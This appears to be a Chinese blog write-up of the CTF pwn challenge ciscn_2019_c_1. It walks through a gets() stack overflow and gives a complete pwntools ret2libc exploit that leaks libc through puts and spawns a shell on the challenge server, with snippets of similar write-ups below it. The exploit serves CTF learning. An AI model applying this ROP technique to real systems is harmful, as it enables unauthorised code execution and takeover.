ciscn_2019_c_1(ret2libc)

已于 2023-04-19 22:24:22 修改
阅读量230 收藏 1
点赞数 1
文章标签: ubuntu linux 网络安全
于 2023-04-19 22:22:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62322730/article/details/130254714
版权
本文介绍了如何使用Python库LibcSearcher和工具ropper来处理pwn问题,特别是针对具有NX保护、未提供libc版本且存在栈溢出的加密程序。通过分析程序,构造ROP链,利用puts()泄露libc基地址,并找到system和binsh地址,最终实现程序的利用。
摘要由CSDN通过智能技术生成

0x00 准备

LibcSearcher:python的一个库,用于解决pwn中不明libc版本的情况。

git clone https://github.com/lieanu/LibcSearcher.git
cd LibcSearcher
sudo python setup.py develop

ropper:找gadgets。官网下载:
​​​​​​https://pypi.org/project/ropper/1.11.2/

解压缩,拖到ubuntu里,进入这个文件。

python3 setup.py install

0x01 分析

checksec:64位,开了NX。

 运行如下图,这是一个加密小程序,1:加密;2:解密;3:退出

 ida分析:有puts(),加密函数里有gets(),存在栈溢出,0x50+8

没有system和binsh,开启了NX,需要自己构造ROP链。没有给出libc文件,可以用puts()来泄露libc基地址。

用ropper找pop rdi

 pop_rdi=0x400c83

0x02 EXP

from pwn import *
from LibcSearcher import *
p=remote("node4.buuoj.cn",26503)
elf=ELF("./ciscn_2019_c_1")

pop_rdi=0x400c83
plt=elf.plt['puts']
got=elf.got['puts']
main=0x400B28

payload1=b'a'*0x58+p64(pop_rdi)+p64(got)+p64(plt)+p64(main)

p.recv()
p.sendline("1")
p.recvuntil("encrypted\n")
p.sendline(payload1)
p.recvuntil(b"Ciphertext\n")
p.recvuntil(b"\n")

addr=u64(p.recv(6).ljust(0x8,b"\x00"))
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")
system=libcbase+libc.dump('system')
binsh=libcbase+libc.dump('str_bin_sh')
res=0x4006b9

payload2=b'a'*0x58+p64(res)+p64(pop_rdi)+p64(binsh)+p64(system)

p.recv()
p.sendline("1")
p.recvuntil("encrypted\n")
p.sendline(payload2)

p.interactive()

0x00 写在最后

萌新跟着别人的文章复现滴~还有很多疑问,本文有任何问题请指正。

为什么‘a’前要加b?

res地址是什么意思?

参考连接:

LibcSearcher--匹配libc版本的神器_Assassin__is__me的博客-CSDN博客

Ubuntu ropper的安装与使用_ropper 安装_yongbaoii的博客-CSDN博客

ciscn_2019_c_1_长街395的博客-CSDN博客

surya……
关注
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4412
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 424
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF ciscn_2019_c_1
、moddemod
06-01 1277
跑一下程序,大致流程是 到现在程序就基本分析完成,接下来需要构造rop泄露libc地址然后利用system等函数获得shell 我们首先要获得libc的基地址,可以通过puts函数入手,这里解释一下为什么通过puts函数而不通过其他函数,因为puts函数在我们进入encrypt函数之前已经调用了很多次了,对于每一个动态链接而言,第一次调用完成以后,就修正了.got表中的对应的puts函数的地址,所以我们可以通过puts函数泄露。 from pwn import * from LibcSearc.
ciscn_2019_c_1
qq_45913417的博客
11-18 8871
经典ret2libc,着实恶心到我了。前后捣鼓了将近3、4个小时,勉强把原理理解透彻。 边做题边C语言:艹! 输入字符串s加密逻辑: 1、如果是小写字母跟0xD异或 2、如果是大写字母跟0xE异或 3、如果是数字跟0xF异或 [ASCII码对照表]:(http://c.biancheng.net/c/ascii/) LibcSearcher工具:https://github.com/dev2ero/LibcSearcher from pwn import * from LibcSearcher i
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 809
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
ciscn_2019_en_2
m0sway的博客
03-25 1640
ciscn_2019_en_2 WriteUp BUU_PWN
【BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4092
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 269
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
[BUUCTF]ciscn_2019_c_1 1
最新发布
weixin_55013445的博客
10-01 206
可知,该程序开启了NX(栈不可执行)保护再使用IDA进行反汇编对代码进行分析可知,漏洞点在encrypt()函数的gets()上到此,思路明确,我们可以通过gets()的栈溢出漏洞,获取libc的基地址,接着通过libc的基地址获取system和str_bin_sh的地址,最后执行system(“/bin/sh”)
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 427
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值